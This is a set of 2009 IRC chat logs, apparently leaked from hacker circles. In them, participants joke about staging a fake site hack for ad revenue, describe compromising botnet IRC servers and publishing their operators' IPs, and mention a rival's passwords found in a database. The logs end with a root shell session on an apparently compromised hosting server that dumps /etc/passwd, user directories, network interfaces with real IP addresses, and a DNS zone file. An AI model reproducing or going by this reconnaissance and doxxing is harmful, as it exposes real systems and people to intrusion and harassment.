+09:16 (RoMeO) me too lmao
+09:16 (BSDGurl) it maybe the future for all i know
+09:16 (BSDGurl) hahaha
+09:16 (RoMeO) future of wat xD
+09:16 (BSDGurl) i just imagine them all pissed off
+09:16 (RoMeO) lmao
+09:16 (RoMeO) 'oh shit'
+09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
+09:18 (RoMeO) gay
+09:18 (BSDGurl) cos this place is so dea
+09:18 (BSDGurl) d
+09:18 (BSDGurl) of course it was like
+09:18 (BSDGurl) you are some pic
+09:18 (BSDGurl) or this or that
+09:18 (RoMeO) lol wow
+09:18 (BSDGurl) i swear i can't go anywhere
+09:18 (RoMeO) ;(
+09:18 (RoMeO) - /nick BSDBoi
+09:18 (BSDGurl) haha
+09:18 (RoMeO) lolol
+09:19 (BSDGurl) i don't understand i
+09:19 (BSDGurl) t
+09:19 (RoMeO) its internet
+09:19 (BSDGurl) you know the big deal
+09:19 (BSDGurl) oh and the guy
+09:19 (BSDGurl) the one you banned that asked me if i was nell
+09:19 (RoMeO) lol yea
+09:19 (BSDGurl) he joined bhf and said
+09:19 (BSDGurl) this chan is for fags
+09:20 (BSDGurl) then left
+09:20 (BSDGurl) rofl
+09:20 (RoMeO) ;O
+09:20 (RoMeO) he gots issues
+09:20 (BSDGurl) so you know i am expecting people to say
+09:20 (BSDGurl) bsdgurl this is you
+09:20 (BSDGurl) and show me someone named nell now
+09:20 (BSDGurl) hahaha
+09:20 (RoMeO) xD
+09:20 (RoMeO) 'i had you on myspace'
+09:20 (RoMeO) wat
+09:20 (RoMeO) .
+09:21 (BSDGurl) i know
+09:21 (BSDGurl) god  being on that site
+09:21 (BSDGurl) i was years ago
+09:21 (RoMeO) facebook is nice ;p 
+
+// http://www.facebook.com/profile.php?id=1119054258 :)
+
+09:21 (BSDGurl) like i haven't been for at least 2
+09:21 (BSDGurl) no lie
+09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
+09:22 (RoMeO) haha
+09:22 (BSDGurl) you know because you could custom it
+09:22 (RoMeO) yeah
+09:22 (RoMeO) not a myspace fan
+09:22 (RoMeO) tho
+09:22 (BSDGurl) me either now
+09:22 (RoMeO) facebook is simple and good
+09:22 (BSDGurl) i have an account
+09:22 (BSDGurl) it's fake
+09:23 (RoMeO) lol i hae a fake account with my public email there
+09:23 (BSDGurl) last log in was december i think
+09:23 (RoMeO) and i lol when people join dmz to tell me
+09:23 (RoMeO) 'hello john genter'
+09:23 (RoMeO) cause the name there is john genter
+09:23 (RoMeO) lmfao
+09:23 (BSDGurl) rofl
+09:23 (BSDGurl) i hate that myspace shit though
+09:23 (BSDGurl) seriously
+09:24 (RoMeO) yeah
+09:24 (BSDGurl) so yeah i am nell
+09:24 (BSDGurl) haha
+09:24 (RoMeO) hai nell
+09:24 (RoMeO) xD
+09:24 (RoMeO) http://www.nellmcandrew.tv/
+09:24 (BSDGurl) i am curious to see if meathive stays
+09:24 (RoMeO) i lol'd
+09:25 (BSDGurl) last night he was really pissed at asta
+09:25 (RoMeO) yea i saw
+09:25 (BSDGurl) i told him you know the servers aren't related
+09:25 (BSDGurl) but i don't think he believed me
+09:25 (RoMeO) what servers 
+09:26 (RoMeO) irc and web?
+09:26 (BSDGurl) they irc
+09:26 (BSDGurl) the
+09:26 (RoMeO) yeah
+09:26 (RoMeO) its ok lol
+09:26 (BSDGurl) i didn't want to like go into with him
+09:27 (BSDGurl) i was just like do what you think is best:/
+09:27 (BSDGurl) i didn't know what to say
+09:27 (RoMeO) haha, what is he doing anyways
+09:27 (RoMeO) i just saw a rant
+09:27 (BSDGurl) i know
+09:27 (BSDGurl) i don't know what
+09:28 (RoMeO) i think people should move on already
+09:28 (BSDGurl) Me TOO
+09:28 (RoMeO) lol!
+09:28 (BSDGurl) thank you
+09:28 (RoMeO) sites get hacked all the time
+09:28 (BSDGurl) you know what i said
+09:28 (BSDGurl) think about this
+09:28 (BSDGurl) you know if you staged
+09:28 (BSDGurl) that
+09:29 (BSDGurl) and threw those ads
+09:29 (BSDGurl) back up
+09:29 (RoMeO) stunt
+09:29 (BSDGurl) you would make bank 
+09:29 (RoMeO) yes.
+09:29 (BSDGurl) :)
+09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
+09:29 (RoMeO) lolol
+09:29 (BSDGurl) yes
+09:29 (BSDGurl) think about that
+09:29 (RoMeO) it got more backlinmks than google over night
+09:29 (BSDGurl) membership down
+09:30 (BSDGurl) etc
+09:30 (BSDGurl) now look
+09:30 (BSDGurl) cash in
+09:30 (BSDGurl) think about it for darkmindz too
+09:30 (BSDGurl) hahaha
+09:30 (RoMeO) lmfao
+09:30 (RoMeO) 'HACKED AND EXPOSED'
+09:30 (BSDGurl) pwn xlink
+09:31  -> BSDGurl dies
+09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
+09:31 (BSDGurl) yes
+09:31 (RoMeO) fun
+09:31 (RoMeO) if i ever need money in uni, thats plan A
+09:31 (BSDGurl) biber can be fall guy
+09:31 (BSDGurl) hahaha
+09:31 (RoMeO) ^^
+09:32 (BSDGurl) let me go back to art shit
+09:32 (RoMeO) oh enjoy
+09:32 (BSDGurl) i just wanted to tell you have a safe trip
+09:33 (RoMeO) thank you <3
+09:33 (BSDGurl) if i didnt get to talk
+09:33 (RoMeO) ^_^
+09:33 (BSDGurl) <3 you are very welcome
+--- Log closed Fri Jun 19 09:34:04 2009
+
+--- Log opened Sun Jun 21 09:24:55 2009
+09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
+09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
+09:25 (RoMeO) mm?
+09:28 (RoMeO) what are you talking about lol
+09:29 ({Glyph_Home}) GSO has had issues this past week.
+09:29 ({Glyph_Home}) I thought perhaps you were the reason.
+09:29 (RoMeO) because  rsnake released a DoS tool
+09:29 (RoMeO) nope
+09:29 ({Glyph_Home}) No.. the litespeed issue
+09:29 (RoMeO) my issues dont go on lagging web servers
+09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
+09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
+09:30 (RoMeO) that too
+09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
+09:31 (RoMeO) about
+09:31 ({Glyph_Home}) Gonna make my  'recommends' to the admins this week.
+09:31 (RoMeO) i find it funny how staff at 'black hat forums'  get to be staff at ' gov sec' 
+09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
+09:32  -> {Glyph_Home} chuckles
+09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
+09:32 (RoMeO) lolol
+09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
+09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
+09:33 (RoMeO) so all good
+09:33 ({Glyph_Home}) Used to..
+
+09:33 (RoMeO) but people who are going down soon are botnet communities for example 
+09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
+09:34 (RoMeO) just cleaning the net
+09:34 ({Glyph_Home}) Straight out of the 'toyshop'
+09:34 (RoMeO) :]
+09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops' 
+09:36 (RoMeO) haha
+
+09:36 (RoMeO) wont be done under antisec 
+09:36 (RoMeO) antisec is kept for 'security' issues 
+09:36 (RoMeO) this is, botnet and skids crap
+
+09:36 ({Glyph_Home}) hmmm... 
+09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
+09:37 (RoMeO) all good so far
+09:37 (RoMeO) lcirc and indoirc got comprimised
+09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
+09:38 ({Glyph_Home}) w00f
+09:38 (RoMeO) ;)
+09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
+09:38 (RoMeO) well
+09:38 (RoMeO) the idea is
+09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
+09:39 (RoMeO) out in the public and all over the net
+09:39 (RoMeO) let the authorities deal with that
+09:39 ({Glyph_Home}) roflmao
+09:39 (RoMeO) :]
+09:39 (RoMeO) brb
+--- Log closed Sun Jun 21 09:44:31 2009
+
+
+--- Log opened Mon Jun 22 16:15:04 2009
+16:15 (Glyph) ?
+16:15 (Glyph) Oh.. that stuff
+16:15 (Glyph) Old stuff.. was playing more or less.
+16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
+16:16 (Glyph) All that is at least five years old or older.
+16:16 (Glyph) circa 2005
+16:17 (RoMeO) yeah
+16:17 (RoMeO) thinking of setting up a box for dark
+16:17 (RoMeO) see what is he going to do
+16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT.. 
+16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
+16:18 (RoMeO) yeah
+16:18 (RoMeO) sure do
+16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
+16:18 (RoMeO) lol
+16:19 (RoMeO) thats why i want to see what is he goign to do on a box
+16:19 (RoMeO) anyone can talk
+16:19 (RoMeO) specially on the internet
+16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
+16:19 (Glyph) snap!
+16:19 (RoMeO) :P
+16:19 (RoMeO) thats what i heared from everyone so far
+16:19 (RoMeO) i will even give him a none chrooted shell
+16:19 (Glyph) Have you lost your mind?
+16:19 (RoMeO) lol
+16:19 (Glyph) Damn if I'd trust him that far.
+16:20 (RoMeO) it will be an empty box
+16:20 (Glyph) jailed, maybe.. unjailed never.
+16:20 (RoMeO) and every shell is modified to log to a remote system
+16:20 (Glyph) Now yer sounding like me.
+16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
+16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here' 
+16:28 (RoMeO) reading stories about knuth
+16:28 (RoMeO) how to own a continent for example
+16:28 (RoMeO) that one is amazing
+16:29 (Glyph) It's NOT hard.
+16:29 (RoMeO) if you didnt read it, you should
+16:38 (RoMeO) i was looking around dark for a while
+16:38 (RoMeO) and what surprised me is
+16:38 (RoMeO) his really low-quality passwords
+16:38 (RoMeO) like
+16:38 (RoMeO) 123123
+16:38 (RoMeO) or 123pass
+16:38 (RoMeO) etc
+16:38 (RoMeO) made me go ?
+16:39 (Glyph) almost as bad as qwerty12345
+16:39 (RoMeO) yes
+16:40 (RoMeO) just one more thing that shows he is talk-only
+16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords'  but using really weak passwords -does- mean something
+16:40 (Glyph) worse yet.. he could be a c&p
+16:40 (RoMeO) that would be so bad
+16:43 (Glyph) Yeah.. it would.
+16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
+16:44 (RoMeO) hahaa
+16:44 (RoMeO) why would we tho
+16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
+16:46 (RoMeO) when that happens i just log on a shell and explore ;p
+16:46 (RoMeO) one more thing
+16:46 (RoMeO) dark is a yahoo user
+16:46 (RoMeO) that counts 
+16:47 (RoMeO) thats -100 sec points
+16:47 (RoMeO) i do tag people by there email s too
+16:47 (RoMeO) for example
+16:47 (RoMeO) yahoo users,  mostly newbies / females
+16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
+16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers 
+16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
+16:50 (RoMeO) found 2 passwords of dark in my db
+16:50 (RoMeO) and they both fail
+16:50 (RoMeO) hellohello is one of them -_-'
+--- Log closed Mon Jun 22 16:55:25 2009
+
+--- Log opened Tue Jun 23 17:19:55 2009
+17:19 (Glyph) ?
+17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
+17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
+17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
+17:20 (Glyph) Ahhh...
+17:21 (Glyph) He came up out of 64.127.41.18
+17:22 (RoMeO) ah
+17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
+17:22 (Glyph) But it goes back to WestVirginia..
+17:22 (RoMeO) yeah
+17:23 (Glyph) Firm called Compucrash
+17:23 (Glyph) Their webserver is at .3 of that range.
+17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
+17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
+17:23 (RoMeO) lol
+17:24 (Glyph) That's when the MySQL threw the error code at me.
+17:24 (Glyph) Then I checked the forums.
+17:24 (Glyph) You wouldn't believe it.. PHPBB3
+17:24 (Glyph) Pr0nsters have already been at it.
+17:24 (RoMeO) lmao
+17:24 (RoMeO) yea
+17:25 (RoMeO) i saw that one
+17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
+17:25 (Glyph) Plus the bw is pricey as heck.
+17:26 (Glyph) I'm heading home..
+17:26 (Glyph) You have a good un.
+17:26 (RoMeO) thanks
+17:26 (RoMeO) enjoy
+--- Log closed Tue Jun 23 17:31:25 2009
+
+--- Log opened Wed Jun 24 17:11:08 2009
+17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
+--- Log closed Wed Jun 24 17:16:42 2009
+
+--- Log opened Sat Jun 27 23:05:38 2009
+23:09 8/[g    <\  \_/   \/    ^   /
+ \_____  /__/\_ \\_____  /\____   | 
+       \/      \/      \/      |__| 
+      .__  __         .__                                   .___                             
+___  _|__|/  |______  |  |   ____________   ____   ____   __| _/______ 
+\  \/ /  \   __\__  \ |  |  /  ___/\____ \_/ __ \_/ __ \ / __ |/  ___/ 
+ \   /|  ||  |  / __ \|  |__\___ \ |  |_> >  ___/\  ___// /_/ |\___ \  
+  \_/ |__||__| (____  /____/____  >|   __/ \___  >\___  >____ /____  > 
+                    \/          \/ |__|        \/     \/     \/    \/  
+          __________                _________              
+          \______   \_______  ____ /   _____/ ____   ____  
+  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
+           |____|     |__|   \____/_______  /\___  >\___  >
+                                          \/     \/     \/ 
+
+root@light [/]# hostname
+light.co1.org
+root@light [/]# uname -a
+Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
+root@light [/]# date
+Tue Jun 23 20:06:26 EDT 2009
+root@light [/]# cd /home
+root@light [/home]# ls
+./            blndbill/       .cpcpan/        deevour/   group88/   joshd/     lost+found/     nglgorg/     r00t/      timc/
+../           blueacre/       cpeasyapache/   denial/    hadrys/    karbassi/  mapmap/         nickg/       radical/   timc14/
+amp3dne/      bziem/          cprestore/      digital/   handknit/  kcole/     maraka/         noct/        rannman/   tmp/
+animal/       cache/          cpzendinstall/  drireign/  harry3/    kidc/      mrwoot/         nycrob/      raven/     tradefx/
+apadana/      cawn/           craig/          edgein/    hasting/   knokes/    msupike/        olliee/      robotey/   untitled/
+aquota.user*  cfurn/          ctcped/         fran459/   hastings/  kozmo/     munin/          pioneer/     russ43/    values/
+army/         charice/        curator/        func88/    ircmilw/   kujio/     MySQL-install/  plumcree/    sheik/     vincent/
+auxone/       chemmer/        daelenbe/       futonre/   jamesj/    kyle/      national/       porch46/     starr/     virtfs/
+badassb/      christa/        danielc/        fxarbitr/  jb007/     lakeshor/  neptunes/       prime/       stopcand/  vitus/
+bebe/         cmilone/        ddosmyi/        ganja/     jeffhem/   light/     netdevil/       psurge/      sub/       wrench/
+berkel/       .cpan/          dear/           ganja51/   jer1h/     lithium/   netenberg/      qstud/       syscrash/  yasha/
+billing/      cpapachebuild/  decalsby/       greg93/    jkaiser/   lost/      nglgnet/        quota.user*  tickah/
+root@light [/home]# 
+
+root@light [/home]# cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
+mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
+cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
+amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
+auxone:x:32006:32007::/home/auxone:/bin/false
+badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
+cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
+cawn:x:32012:32013::/home/cawn:/bin/false
+cfurn:x:32013:32014::/home/cfurn:/bin/false
+cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
+craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
+dear:x:32021:32022::/home/dear:/bin/false
+drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
+fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
+futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
+greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
+harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
+jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
+joshd:x:32040:32041::/home/joshd:/bin/false
+kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
+kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
+kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
+light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
+lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
+msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
+neptunes:x:32058:32059::/home/neptunes:/bin/sh
+nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
+olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
+pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
+plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
+porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
+qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
+rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
+sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
+starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
+stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
+timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
+values:x:32090:32091::/home/values:/bin/sh
+vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
+yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
+tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
+charice:x:32106:32107::/home/charice:/bin/false
+animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
+ganja51:x:32110:32111::/home/ganja51:/bin/false
+ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
+mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
+karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
+nycrob:x:32115:32116::/home/nycrob:/bin/false
+radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
+jer1h:x:32119:32120::/home/jer1h:/bin/false
+denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
+jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
+nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
+nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
+russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
+berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
+hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
+knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
+decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
+lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
+army:x:32136:32138::/home/army:/bin/false
+curator:x:32138:32140::/home/curator:/bin/false
+tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
+national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
+robotey:x:32147:32149::/home/robotey:/bin/false
+vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
+psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
+prime:x:32150:32152::/home/prime:/bin/false
+digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
+ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
+blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
+kujio:x:32157:32159::/home/kujio:/bin/false
+untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
+danielc:x:32159:32161::/home/danielc:/bin/false
+billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
+syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
+hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
+wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
+apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
+ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
+blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
+edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
+hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
+bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
+mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
+cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
+cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
+cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
+kyle:x:32177:32179::/home/kyle:/bin/false
+ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
+fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
+func88:x:32180:32182::/home/func88:/bin/bash
+cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
+cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
+cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
+cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
+christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
+bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
+jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
+timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
+munin:x:32186:32188::/home/munin:/bin/bash
+noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
+jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
+chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
+daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
+deevour:x:32191:32193::/home/deevour:/bin/bash
+raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
+lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
+netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
+sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
+r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
+maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
+root@light [/home]# 
+
+
+root@light [~]# ifconfig -a
+eth0      Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.181  Bcast:66.197.170.191  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:652037555 (621.8 MiB)  TX bytes:1600708482 (1.4 GiB)
+          Interrupt:16 Base address:0xd000 
+
+eth0:1    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.182  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:2    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.183  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:3    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.185  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:4    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.186  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:5    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.184  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+gre0      Link encap:UNSPEC  HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00  
+          NOARP  MTU:1476  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+lo        Link encap:Local Loopback  
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:3605264865 (3.3 GiB)  TX bytes:3605264865 (3.3 GiB)
+
+tunl0     Link encap:IPIP Tunnel  HWaddr   
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+root@light [~]# cat /var/named/ownage.net.db
+; Modified by Web Host Manager
+; Zone File for ownage.net
+$TTL 14400
+@       86400   IN      SOA     dns.vitalspeeds.com.    support.vitalspeeds.com.        (
+                                        2006111702
+                                        86400
+                                        7200
+                                        3600000
+                                        86400
+                                        )
+
